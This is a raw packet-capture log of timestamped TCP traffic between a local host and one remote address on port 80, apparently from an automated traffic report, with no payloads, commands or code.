                                                                                                                                                              Oct 11, 2024 22:32:36.511249065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511260033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511262894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511274099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511287928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511292934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511312962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511312962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511323929 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511334896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511346102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511360884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511368990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511393070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511393070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511424065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511434078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511450052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511462927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511462927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511476040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511482000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511492968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511502028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511513948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511517048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511528015 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511531115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511545897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511554003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511563063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511567116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511584044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511598110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511605024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511610985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511629105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511630058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511642933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511646032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511662006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511670113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511678934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511687040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511689901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511710882 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511710882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511724949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511727095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511742115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511743069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511759043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511775017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511933088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511944056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511960030 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511971951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.511972904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511991024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.511995077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512005091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512022972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512025118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512042999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512063980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512074947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512085915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512101889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512115955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512124062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512130976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512147903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512151957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512161970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512166977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512186050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512187004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512200117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512202024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512216091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512221098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512231112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512233973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512250900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512252092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512264967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512267113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512281895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512281895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512298107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512301922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512311935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512316942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512332916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512334108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512348890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512350082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512362957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512371063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512378931 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512392044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512402058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512418985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512425900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512433052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.512450933 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.512465954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.977858067 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.977927923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.977957964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.977977991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.977998972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978008032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978023052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978045940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978053093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978074074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978079081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978096962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978107929 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978116035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978131056 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978137970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978154898 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978157043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978169918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978183985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978192091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978210926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978230000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978244066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978256941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978264093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978277922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978297949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978308916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978318930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978332996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978338957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978355885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978360891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978370905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978385925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978399992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978406906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978425980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978426933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978441000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978449106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978455067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978471041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978490114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978501081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978511095 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978523970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978532076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978549004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978550911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978559971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978573084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978579044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978594065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978612900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978626013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978640079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978647947 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978668928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978672028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978689909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978698969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978709936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978728056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978743076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978745937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978764057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978770018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978789091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978790045 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978801966 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978810072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978816986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978833914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978838921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978853941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978863955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978874922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978883028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978894949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978903055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978915930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.978950024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.978960037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979005098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979039907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979049921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979094028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979129076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979152918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979202032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979238987 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979245901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979290962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979330063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979351044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979424000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979465961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979469061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979531050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979568958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979579926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979625940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979662895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979685068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979729891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979767084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979773045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979832888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979870081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979876995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979922056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979957104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.979962111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.979995012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980021954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980067015 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980107069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980108976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980154037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980192900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980199099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980247974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980283976 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980290890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980335951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980372906 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980379105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980424881 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980460882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980468035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980513096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980550051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980556011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980600119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980634928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980647087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980679989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980691910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980751038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980788946 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980794907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980837107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980873108 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980879068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980925083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.980962992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.980969906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981014013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981055975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981057882 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981105089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981141090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981148958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981193066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981230021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981236935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981282949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981317997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981327057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981370926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981406927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981416941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981462002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981496096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981507063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981550932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981586933 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981594086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981627941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981638908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981683016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981717110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981726885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981770992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981817007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981817961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981862068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981897116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981905937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981940031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.981950998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.981995106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.982028961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.982038975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.982083082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.982117891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.982125998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.982170105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.982204914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:36.982213974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:36.982245922 CEST4970780192.168.2.845.66.249.162
